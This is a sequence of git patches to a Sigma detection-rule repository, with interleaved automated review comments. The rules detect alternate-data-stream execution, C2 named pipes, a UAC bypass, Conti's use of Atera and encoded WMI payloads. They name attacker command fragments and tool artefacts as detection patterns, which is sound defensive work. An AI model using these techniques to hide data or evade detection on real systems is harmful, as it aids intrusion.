Unknown +level: high From 470d64e66cb1114341eded853155ceed2bc17835 Mon Sep 17 00:00:00 2001 
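Review bot: `product: EndPoint Detection Logs` together with `EventLog: EDR` and `EventType: WMIExecution` in selection1 is not a logsource or field set a generic Sigma backend mapping is likely to recognise, so the rule as committed probably cannot be converted without a custom configuration; either add a comment next to `logsource:` stating which product and field mapping is expected, or express the detection over a generic logsource (`product: windows`, `category: process_creation`) using `ParentImage` and `CommandLine`. The `Image` list with embedded `*` (e.g. `- '*\powerpnt.exe'`) also puts wildcards into plain values where the sibling rules use `Image|endswith:`. These lines are context in this hunk, so the commit leaves them as they were.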
From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 31 Aug 2021 22:28:34 -0600 Subject: [PATCH 0667/1367] Updated Rule Completed the following updates on the rule: - Modified the title - incremented 4 spaces for references and tags - updated false positives - updated author - updated description in detection section. --- ...ice_applications_using_file_extentions.yml | 24 +++++++++---------- 1 file changed, 12 insertions(+), 12 deletions(-) diff --git a/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml index c4293b6a..e2411d65 100644 --- a/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml +++ b/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml 
@@ -1,15 +1,15 @@ -title: monitor executable and script files creation by Office applications, using file extensions and Magic Bytes (EDR). +title: Executable and Files creation by Office Applications description: This rule will monitor executable and script file creation by office applications. Please add more file extentions or magic bytes to the logic of your choice. references: -- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ -- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Idea by: Vadim Khrykov" + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" tags: -- attack.t1204.002 -- attack.t1047 -- attack.t1218.010 -- attack.execution -- attack.defence_evasion + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion status: experimental Date: 2021/23/8 logsource: @@ -17,7 +17,7 @@ logsource: service: Sysmon category: process_creation detection: - description: Please add more file extentions and magic bytes to the logic of your choice. + #useful_information: Please add more file extentions and magic bytes to the logic of your choice. selection1: EventType: - FileCreate @@ -45,5 +45,5 @@ detection: - "4D5A" condition: selection1 AND selection2 AND (selection3 OR selection4) falsepositives: -- "" -level: high \ No newline at end of file +- Unknown +level: high From 6f3fc7036e69b1af20005213ab55540f783d23b6 Mon Sep 17 00:00:00 2001 
From: frack113 Date: Wed, 1 Sep 2021 09:45:31 +0200 Subject: [PATCH 0668/1367] Update tags
---
rules/windows/malware/av_hacktool.yml | 2 ++ rules/windows/powershell/powershell_invoke_nightmare.yml | 2 ++ 2 files changed, 4 insertions(+)
diff --git a/rules/windows/malware/av_hacktool.yml b/rules/windows/malware/av_hacktool.yml
index fe2fa7cf..e074241f 100644
--- a/rules/windows/malware/av_hacktool.yml
+++ b/rules/windows/malware/av_hacktool.yml
@@ -23,3 +23,5 @@ fields:
 falsepositives:
 - Unlikely
 level: high
+tags:
+ - attack.execution
\ No newline at end of file
diff --git a/rules/windows/powershell/powershell_invoke_nightmare.yml b/rules/windows/powershell/powershell_invoke_nightmare.yml
index a98b9bba..553f535e 100644
--- a/rules/windows/powershell/powershell_invoke_nightmare.yml
+++ b/rules/windows/powershell/powershell_invoke_nightmare.yml
@@ -19,3 +19,5 @@ detection:
 falsepositives:
 - Unknown
 level: high
+tags:
+ - attack.privilege_escalation
From 240c5584ffa6e8e54f64dedfbdcba30ddcc780c3 Mon Sep 17 00:00:00 2001
From: frack113 Date: Wed, 1 Sep 2021 09:56:46 +0200 Subject: [PATCH 0669/1367] update tags
---
rules/windows/malware/av_relevant_files.yml | 3 +++ 1 file changed, 3 insertions(+)
diff --git a/rules/windows/malware/av_relevant_files.yml b/rules/windows/malware/av_relevant_files.yml
index c200959a..fb82c313 100644
--- a/rules/windows/malware/av_relevant_files.yml
+++ b/rules/windows/malware/av_relevant_files.yml
@@ -72,3 +72,6 @@ fields:
 falsepositives:
 - Unlikely
 level: high
+tags:
+ - attack.resource_development
+ - attack.t1588
\ No newline at end of file
From 9ffdced740a0380f642a6c8ecaef5f22cb0044cc Mon Sep 17 00:00:00 2001
From: phantinuss Date: Wed, 1 Sep 2021 10:21:37 +0200 Subject: [PATCH 0670/1367] fix: implement suggestions from PR discussion
---
rules/windows/file_event/sysmon_uac_bypass_ieinstal.yml | 3 ++- rules/windows/process_creation/win_uac_bypass_ieinstal.yml | 3 ++- 2 files changed, 4 insertions(+), 2 deletions(-)
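Review bot: The new `tags:` block is appended after `level:` at the very end of av_hacktool.yml and the file is then left without a trailing newline (the `\ No newline at end of file` marker), and av_relevant_files.yml in the following commit gets the same treatment; the newly added Atera rule later in this series places `tags:` in the metadata block before `detection:`, so putting the block there and ending the file with a newline keeps the rules consistent. `attack.execution` for av_hacktool.yml and `attack.privilege_escalation` for powershell_invoke_nightmare.yml are tactic-only tags, whereas the same author pairs tactic and technique in the win_mal_ryuk.yml hunk (`- attack.execution` / `- attack.t1204`); adding the matching technique id here would follow that convention. The end-of-file placement recurs in the tag commits for win_mal_ryuk.yml, win_av_relevant_match.yml, win_mal_darkside.yml, win_ntfs_vuln_exploit.yml, win_scm_database_privileged_operation.yml, win_susp_failed_guest_logon.yml and sysmon_susp_prog_location_network_connection.yml.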
diff --git a/rules/windows/file_event/sysmon_uac_bypass_ieinstal.yml b/rules/windows/file_event/sysmon_uac_bypass_ieinstal.yml
index 6e61f089..9ba625f0 100644
--- a/rules/windows/file_event/sysmon_uac_bypass_ieinstal.yml
+++ b/rules/windows/file_event/sysmon_uac_bypass_ieinstal.yml
@@ -20,5 +20,6 @@ detection:
 selection:
 Image: 'C:\Program Files\Internet Explorer\IEInstal.exe'
 TargetFilename|startswith: 'C:\Users\'
- TargetFilename|endswith: '\AppData\Local\Temp\IDC1.tmp\[1]consent.exe'
+ TargetFilename|contains: '\AppData\Local\Temp\'
+ TargetFilename|endswith: 'consent.exe'
 condition: selection
diff --git a/rules/windows/process_creation/win_uac_bypass_ieinstal.yml b/rules/windows/process_creation/win_uac_bypass_ieinstal.yml
index a6458810..7c734ccf 100644
--- a/rules/windows/process_creation/win_uac_bypass_ieinstal.yml
+++ b/rules/windows/process_creation/win_uac_bypass_ieinstal.yml
@@ -22,5 +22,6 @@ detection:
 - 'High'
 - 'System'
 ParentImage|endswith: '\ieinstal.exe'
- Image|endswith: '\AppData\Local\Temp\IDC1.tmp\[1]consent.exe'
+ Image|contains: '\AppData\Local\Temp\'
+ Image|endswith: 'consent.exe'
 condition: selection
From 4b8ffbc183c597e448e8a1a09b7aeddbda3fd406 Mon Sep 17 00:00:00 2001
From: frack113 Date: Wed, 1 Sep 2021 10:30:43 +0200 Subject: [PATCH 0671/1367] Update tags
---
rules/windows/malware/win_mal_ryuk.yml | 3 +++ 1 file changed, 3 insertions(+)
diff --git a/rules/windows/malware/win_mal_ryuk.yml b/rules/windows/malware/win_mal_ryuk.yml
index 02603871..156ee19a 100644
--- a/rules/windows/malware/win_mal_ryuk.yml
+++ b/rules/windows/malware/win_mal_ryuk.yml
@@ -24,3 +24,6 @@ detection:
 falsepositives:
 - Unlikely
 level: critical
+tags:
+ - attack.execution
+ - attack.t1204
From 892c58270a1985fe38ff9ca4875539d92c84c65e Mon Sep 17 00:00:00 2001
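Review bot: `TargetFilename|endswith: 'consent.exe'` (and `Image|endswith: 'consent.exe'` in the second hunk) no longer anchors on a path separator, so any executable whose file name merely ends in `consent.exe` under `\AppData\Local\Temp\` now matches, whereas the replaced pattern anchored on `\[1]consent.exe`. Keeping the variable temp directory tolerant but the file name exact is a one-character change in each file: `TargetFilename|endswith: '\consent.exe'` and `Image|endswith: '\consent.exe'`.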
From: frack113 Date: Wed, 1 Sep 2021 10:33:57 +0200 Subject: [PATCH 0672/1367] Update tags --- rules/windows/builtin/win_av_relevant_match.yml | 3 +++ rules/windows/malware/win_mal_darkside.yml | 3 +++ 2 files changed, 6 insertions(+) diff --git a/rules/windows/builtin/win_av_relevant_match.yml b/rules/windows/builtin/win_av_relevant_match.yml index fd321a9a..da2e8dce 100644 --- a/rules/windows/builtin/win_av_relevant_match.yml +++ b/rules/windows/builtin/win_av_relevant_match.yml @@ -36,3 +36,6 @@ detection: falsepositives: - Some software piracy tools (key generators, cracks) are classified as hack tools level: high +tags: + - attack.resource_development + - attack.t1588 \ No newline at end of file diff --git a/rules/windows/malware/win_mal_darkside.yml b/rules/windows/malware/win_mal_darkside.yml index 26d609be..e050210d 100644 --- a/rules/windows/malware/win_mal_darkside.yml +++ b/rules/windows/malware/win_mal_darkside.yml @@ -26,3 +26,6 @@ falsepositives: - Unknown - UAC bypass method used by other malware level: critical +tags: + - attack.execution + - attack.t1204 From 6859b6c38f4d748ee335a400998cb6ac6313ebc0 Mon Sep 17 00:00:00 2001 From: Bhabesh Rai Date: Wed, 1 Sep 2021 15:24:47 +0545 Subject: [PATCH 0673/1367] Added rule for detection of Atera RMM Agent installation --- .../win_software_atera_rmm_agent_install.yml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 rules/windows/builtin/win_software_atera_rmm_agent_install.yml diff --git a/rules/windows/builtin/win_software_atera_rmm_agent_install.yml b/rules/windows/builtin/win_software_atera_rmm_agent_install.yml new file mode 100644 index 00000000..b3a7f22b --- /dev/null +++ b/rules/windows/builtin/win_software_atera_rmm_agent_install.yml 
@@ -0,0 +1,22 @@ +title: Atera Agent Installation +id: 87261fb2-69d0-42fe-b9de-88c6b5f65a43 +status: experimental +description: Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators +references: + - https://www.advintel.io/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent +date: 2021/09/01 +author: Bhabesh Raj +level: high +logsource: + service: application + product: windows +tags: + - attack.t1219 +detection: + selection: + EventID: 1033 + Source: MsiInstaller + Message|contains: AteraAgent + condition: selection +falsepositives: + - Legitimate Atera agent installation \ No newline at end of file From 2cb5f5e4c64fbf3c837c47f632056d0f6e300518 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 1 Sep 2021 12:54:21 +0200 Subject: [PATCH 0674/1367] add missing tags --- rules/windows/builtin/win_ntfs_vuln_exploit.yml | 3 +++ .../windows/builtin/win_scm_database_privileged_operation.yml | 3 +++ rules/windows/builtin/win_susp_failed_guest_logon.yml | 3 +++ .../sysmon_susp_prog_location_network_connection.yml | 3 +++ 4 files changed, 12 insertions(+) diff --git a/rules/windows/builtin/win_ntfs_vuln_exploit.yml b/rules/windows/builtin/win_ntfs_vuln_exploit.yml index 3efcaf88..060a8262 100644 --- a/rules/windows/builtin/win_ntfs_vuln_exploit.yml +++ b/rules/windows/builtin/win_ntfs_vuln_exploit.yml @@ -20,3 +20,6 @@ detection: falsepositives: - Unlikely level: critical +tags: + - attack.impact + - attack.t1499.001 \ No newline at end of file diff --git a/rules/windows/builtin/win_scm_database_privileged_operation.yml b/rules/windows/builtin/win_scm_database_privileged_operation.yml index 9501875a..5c59eb7e 100644 --- a/rules/windows/builtin/win_scm_database_privileged_operation.yml +++ b/rules/windows/builtin/win_scm_database_privileged_operation.yml 
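Review bot: `Message|contains: AteraAgent` is the only unquoted string value in the rule while every other value in this series is single-quoted; quoting it (`Message|contains: 'AteraAgent'`) keeps the style consistent and avoids plain-scalar surprises if the value is ever extended with `:` or `#`. The selection keys on MsiInstaller event 1033, so only successful MSI-based installs are observed; a clause in `description:` stating that scope would tell operators what other install paths are not covered. With `falsepositives:` already naming legitimate Atera rollouts, `level: high` will fire on every agent deployment in an organisation that uses Atera — consider documenting that the rule is meant for environments where Atera is not sanctioned, or lowering the level there. The file also ends without a trailing newline.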
@@ -21,3 +21,6 @@ detection: falsepositives: - Unknown level: critical +tags: + - attack.privilege_escalation + - attack.t1548 \ No newline at end of file diff --git a/rules/windows/builtin/win_susp_failed_guest_logon.yml b/rules/windows/builtin/win_susp_failed_guest_logon.yml index 0d7657d5..7a6fae07 100644 --- a/rules/windows/builtin/win_susp_failed_guest_logon.yml +++ b/rules/windows/builtin/win_susp_failed_guest_logon.yml @@ -25,3 +25,6 @@ fields: - User falsepositives: - Account fallback reasons (after failed login with specific account) +tags: + - attack.credential_access + - attack.t1110.001 \ No newline at end of file diff --git a/rules/windows/network_connection/sysmon_susp_prog_location_network_connection.yml b/rules/windows/network_connection/sysmon_susp_prog_location_network_connection.yml index b8c4544d..f93c48f5 100755 --- a/rules/windows/network_connection/sysmon_susp_prog_location_network_connection.yml +++ b/rules/windows/network_connection/sysmon_susp_prog_location_network_connection.yml @@ -31,3 +31,6 @@ detection: falsepositives: - unknown level: high +tags: + - attack.command_and_control + - attack.t1105 \ No newline at end of file From 8bba246205fcc9ac6fd0e37cfc6e053bf14a3d3e Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 1 Sep 2021 12:57:34 +0200 Subject: [PATCH 0675/1367] refactor: better way to write it --- rules/windows/builtin/win_susp_msmpeng_crash.yml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/rules/windows/builtin/win_susp_msmpeng_crash.yml b/rules/windows/builtin/win_susp_msmpeng_crash.yml index 0dde4962..8cc330fb 100644 --- a/rules/windows/builtin/win_susp_msmpeng_crash.yml +++ b/rules/windows/builtin/win_susp_msmpeng_crash.yml 
@@ -22,11 +22,10 @@ detection: selection2: Source: 'Windows Error Reporting' EventID: 1001 - keyword1: + keywords: - 'MsMpEng.exe' - keyword2: - 'mpengine.dll' - condition: 1 of selection* and keyword1 and keyword2 + condition: 1 of selection* and all of keywords falsepositives: - MsMpEng.exe can crash when C:\ is full level: high From f102b2d9a1149458069931c41f20bbc786c29a44 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 1 Sep 2021 13:07:18 +0200 Subject: [PATCH 0676/1367] docs: note to improved sysmon config --- rules/windows/pipe_created/sysmon_mal_cobaltstrike.yml | 2 +- rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml | 2 +- .../pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/windows/pipe_created/sysmon_mal_cobaltstrike.yml b/rules/windows/pipe_created/sysmon_mal_cobaltstrike.yml index 3075d846..89612067 100644 --- a/rules/windows/pipe_created/sysmon_mal_cobaltstrike.yml +++ b/rules/windows/pipe_created/sysmon_mal_cobaltstrike.yml @@ -16,7 +16,7 @@ tags: logsource: product: windows category: pipe_created - definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). In the current popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config) this is not there, you have to add it yourself.' + definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). In the current popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config) this is not there, you have to add it yourself or use this extended version that logs the Named Pipes used in this Sigma repo (https://github.com/Neo23x0/sysmon-config)' detection: selection_MSSE: PipeName|contains|all: diff --git a/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml index 97b9e587..16305648 100644 
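Review bot: `all of keywords` does not preserve the AND that `keyword1 and keyword2` expressed: a keyword list is OR-ed, and `all of <pattern>` applied to the single identifier `keywords` reduces to just `keywords`, so a crash report mentioning only `MsMpEng.exe` (or only `mpengine.dll`) now matches where before both strings were required. To keep the conjunction, nest the list under the `'|all'` key — `keywords:` followed by `'|all':` with the two strings indented beneath it — and write `condition: 1 of selection* and keywords`. `selection1` sits above the hunk, so the rest of the condition is not visible here.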
--- a/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml +++ b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml @@ -13,7 +13,7 @@ tags: logsource: product: windows category: pipe_created - definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). In the current popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config) this is not there, you have to add it yourself.' + definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). In the current popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config) this is not there, you have to add it yourself or use this extended version that logs the Named Pipes used in this Sigma repo (https://github.com/Neo23x0/sysmon-config)' detection: selection: - PipeName|re: '\\mojo\.5688\.8052\.183894939787088877[0-9a-f]{2}' diff --git a/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml b/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml index c9a3da84..da7bb0a7 100644 --- a/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml +++ b/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml 
@@ -13,7 +13,7 @@ tags: logsource: product: windows category: pipe_created - definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). In the current popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config) this is not there, you have to add it yourself.' + definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). In the current popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config) this is not there, you have to add it yourself or use this extended version that logs the Named Pipes used in this Sigma repo (https://github.com/Neo23x0/sysmon-config)' detection: selection_malleable_profiles: PipeName|startswith: From 80dbfa7af5781efc858bcc3054788572ade46e55 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 1 Sep 2021 13:52:09 +0200 Subject: [PATCH 0677/1367] add process_creation_alternate_data_streams.yml --- ...rocess_creation_alternate_data_streams.yml | 57 +++++++++++++++++++ 1 file changed, 57 insertions(+) create mode 100644 rules/windows/process_creation/process_creation_alternate_data_streams.yml diff --git a/rules/windows/process_creation/process_creation_alternate_data_streams.yml b/rules/windows/process_creation/process_creation_alternate_data_streams.yml new file mode 100644 index 00000000..f98b1f01 --- /dev/null +++ b/rules/windows/process_creation/process_creation_alternate_data_streams.yml 
@@ -0,0 +1,57 @@ +title: Execute From Alternate Data Streams +id: 7f43c430-5001-4f8b-aaa9-c3b88f18fa5c +status: experimental +author: frack113 +date: 2021/0901 +description: Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md +tags: + - attack.defense_evasion + - attack.t1564.004 +logsource: + category: process_creation + product: windows +detection: + selection_stream: + CommandLine|contains: 'txt:' + selection_tools_type: + CommandLine|contains|all: + - 'type ' + - ' > ' + selection_tools_findstr: + CommandLine|contains|all: + - 'findstr ' + - ' /V ' + - ' /L ' + selection_tools_makecab: + CommandLine|contains|all: + - 'makecab ' + - '.cab' + selection_tools_dir: + CommandLine|contains|all: + - 'print ' + - '/D:' + selection_tools_reg: + CommandLine|contains|all: + - 'reg ' + - ' export ' + selection_tools_regedit: + CommandLine|contains|all: + - 'regedit ' + - ' /E ' + selection_tools_regedit: + CommandLine|contains|all: + - 'regedit ' + - ' /E ' + selection_tools_esentutl: + CommandLine|contains|all: + - 'esentutl ' + - ' /y ' + - ' /d ' + - ' /o ' + + condition: selection_stream and (1 of selection_tools_*) +falsepositives: + - Unknown +level: medium From affc929c3b49e3d3cbdb1cfce4cebc7e01573467 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 1 Sep 2021 13:54:47 +0200 Subject: [PATCH 0678/1367] LiquidSnake named pipe --- rules/windows/pipe_created/sysmon_mal_namedpipes.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/pipe_created/sysmon_mal_namedpipes.yml b/rules/windows/pipe_created/sysmon_mal_namedpipes.yml index e425bf51..f8fbc077 100644 --- a/rules/windows/pipe_created/sysmon_mal_namedpipes.yml +++ b/rules/windows/pipe_created/sysmon_mal_namedpipes.yml 
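Review bot: `selection_stream` requires `txt:` in the command line, so the rule only covers streams attached to `.txt` host files; the atomic test in `references:` uses that form, but a stream on any other file name will be missed. If this narrowing is deliberate to limit false positives, it is worth stating in `description:` or `falsepositives:` so the gap is a documented choice rather than an accident. The duplicated `selection_tools_regedit` key, the mismatched `selection_tools_dir` name and the malformed `date:` are corrected by later commits on this page; the rewrite there keeps the same `selection_stream`, so this note applies to it as well.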
@@ -34,6 +34,7 @@ detection: - '\Posh*' #PoshC2 default - '\jaccdpqnvbrrxlaf' #PoshC2 default - '\csexecsvc' #CSEXEC default + - '\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7' # LiquidSnake https://github.com/RiccardoAncarani/LiquidSnake condition: selection tags: - attack.defense_evasion From e71fce6f11a11c1b14aebf59b47f1bfb42d8f8f2 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 1 Sep 2021 13:55:14 +0200 Subject: [PATCH 0679/1367] fix errors --- ...rocess_creation_alternate_data_streams.yml | 109 +++++++++--------- 1 file changed, 52 insertions(+), 57 deletions(-) diff --git a/rules/windows/process_creation/process_creation_alternate_data_streams.yml b/rules/windows/process_creation/process_creation_alternate_data_streams.yml index f98b1f01..643417f3 100644 --- a/rules/windows/process_creation/process_creation_alternate_data_streams.yml +++ b/rules/windows/process_creation/process_creation_alternate_data_streams.yml 
@@ -1,57 +1,52 @@ -title: Execute From Alternate Data Streams -id: 7f43c430-5001-4f8b-aaa9-c3b88f18fa5c -status: experimental -author: frack113 -date: 2021/0901 -description: Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection -references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md -tags: - - attack.defense_evasion - - attack.t1564.004 -logsource: - category: process_creation - product: windows -detection: - selection_stream: - CommandLine|contains: 'txt:' - selection_tools_type: - CommandLine|contains|all: - - 'type ' - - ' > ' - selection_tools_findstr: - CommandLine|contains|all: - - 'findstr ' - - ' /V ' - - ' /L ' - selection_tools_makecab: - CommandLine|contains|all: - - 'makecab ' - - '.cab' - selection_tools_dir: - CommandLine|contains|all: - - 'print ' - - '/D:' - selection_tools_reg: - CommandLine|contains|all: - - 'reg ' - - ' export ' - selection_tools_regedit: - CommandLine|contains|all: - - 'regedit ' - - ' /E ' - selection_tools_regedit: - CommandLine|contains|all: - - 'regedit ' - - ' /E ' - selection_tools_esentutl: - CommandLine|contains|all: - - 'esentutl ' - - ' /y ' - - ' /d ' - - ' /o ' - - condition: selection_stream and (1 of selection_tools_*) -falsepositives: - - Unknown -level: medium +title: Execute From Alternate Data Streams +id: 7f43c430-5001-4f8b-aaa9-c3b88f18fa5c +status: experimental +author: frack113 +date: 2021/0901 +description: Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md +tags: + - attack.defense_evasion + - attack.t1564.004 +logsource: + category: process_creation + product: windows +detection: + selection_stream: + CommandLine|contains: 'txt:' + selection_tools_type: + CommandLine|contains|all: + - 'type ' + - ' > ' + selection_tools_findstr: + CommandLine|contains|all: + 
- 'findstr ' + - ' /V ' + - ' /L ' + selection_tools_makecab: + CommandLine|contains|all: + - 'makecab ' + - '.cab' + selection_tools_print: + CommandLine|contains|all: + - 'print ' + - '/D:' + selection_tools_reg: + CommandLine|contains|all: + - 'reg ' + - ' export ' + selection_tools_regedit: + CommandLine|contains|all: + - 'regedit ' + - ' /E ' + selection_tools_esentutl: + CommandLine|contains|all: + - 'esentutl ' + - ' /y ' + - ' /d ' + - ' /o ' + condition: selection_stream and (1 of selection_tools_*) +falsepositives: + - Unknown +level: medium From 8761927e8ce691486646adc8cc61c4364a5e2b29 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 1 Sep 2021 13:57:17 +0200 Subject: [PATCH 0680/1367] rule: susp scrcons.exe creating named pipe --- .../sysmon_susp_wmi_consumer_namedpipe.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/windows/pipe_created/sysmon_susp_wmi_consumer_namedpipe.yml diff --git a/rules/windows/pipe_created/sysmon_susp_wmi_consumer_namedpipe.yml b/rules/windows/pipe_created/sysmon_susp_wmi_consumer_namedpipe.yml new file mode 100644 index 00000000..1d4e7e24 --- /dev/null +++ b/rules/windows/pipe_created/sysmon_susp_wmi_consumer_namedpipe.yml 
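Review bot: This commit rewrites all 57 lines of the file to make three edits (the `selection_tools_dir` → `selection_tools_print` rename, the removed duplicate `selection_tools_regedit` block, and the dropped blank line before `condition:`), which presumably means line endings or indentation changed on every line; whole-file churn like this hides the real change in review and in blame. Normalising line endings in a separate commit, or keeping the repository's existing endings in the editor, would keep a fix of this size readable as three changed lines. The `date:` is still `2021/0901` here and is corrected by a following commit on this page.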
@@ -0,0 +1,23 @@ +title: WMI Event Consumer Created Named Pipe +id: 493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb +status: experimental +description: Detects the WMI Event Consumer service scrcons.exe creating a named pipe +references: + - https://github.com/RiccardoAncarani/LiquidSnake +date: 2021/09/01 +author: Florian Roth +tags: + - attack.defense_evasion + - attack.privilege_escalation + - attack.t1055 +logsource: + product: windows + category: pipe_created + definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). In the current popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config) this is not there, you have to add it yourself or use this extended version that logs the Named Pipes used in this Sigma repo (https://github.com/Neo23x0/sysmon-config)' +detection: + selection: + Image|endswith: '\scrcons.exe' + condition: selection +falsepositives: + - Unknown +level: high From e787420be1d013c0f0ae93993d23e327b711ae70 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 1 Sep 2021 13:57:36 +0200 Subject: [PATCH 0681/1367] rule: WMI filter content encoded executable --- .../sysmon_wmi_susp_encoded_scripts.yml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml diff --git a/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml b/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml new file mode 100644 index 00000000..03338301 --- /dev/null +++ b/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml 
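Review bot: The title says "Created Named Pipe", but the rule's own `definition:` states that the `pipe_created` category covers both Sysmon Event ID 17 (create) and 18 (connect), so `Image|endswith: '\scrcons.exe'` alone will presumably also fire when scrcons.exe connects to an existing pipe. If creation alone is intended, add `EventID: 17` to the selection; if both are wanted, the title and description should say so. `falsepositives: Unknown` at `level: high` for a process that legitimately hosts ActiveScript consumers may be optimistic, though no baseline is visible here to judge it.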
@@ -0,0 +1,28 @@ +title: Suspicious Encoded Scripts in a WMI Consumer +id: 83844185-1c5b-45bc-bcf3-b5bf3084ca5b +status: experimental +description: Detects suspicious encoded payloads in WMI Event Consumers +author: Florian Roth +references: + - https://github.com/RiccardoAncarani/LiquidSnake +date: 2021/09/01 +tags: + - attack.t1086 # an old one + - attack.execution + - attack.t1059.005 +logsource: + product: windows + category: wmi_event +detection: + selection_destination: + - Destination|base64offset|contains: + - 'WriteProcessMemory' + - 'This program cannot be run in DOS mode' + - 'This program must be run under Win32' + condition: selection_destination +fields: + - User + - Operation +falsepositives: + - Unknown +level: high From 505140d273553f4a2db27b3323b26e5ca7ec10f6 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 1 Sep 2021 13:57:48 +0200 Subject: [PATCH 0682/1367] rule: extended WMI suspicious scripts rule --- .../windows/wmi_event/sysmon_wmi_susp_scripting.yml | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml b/rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml index bea1f3af..e4b7fbf1 100644 --- a/rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml +++ b/rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml @@ -6,7 +6,9 @@ author: Florian Roth, Jonhnathan Ribeiro references: - https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/ - https://github.com/Neo23x0/signature-base/blob/master/yara/gen_susp_lnk_files.yar#L19 + - https://github.com/RiccardoAncarani/LiquidSnake date: 2019/04/15 +modified: 2021/09/01 tags: - attack.t1086 # an old one - attack.execution @@ -15,8 +17,6 @@ logsource: product: windows category: wmi_event detection: - selection: - EventID: 20 selection_destination: - Destination|contains|all: - 'new-object' 
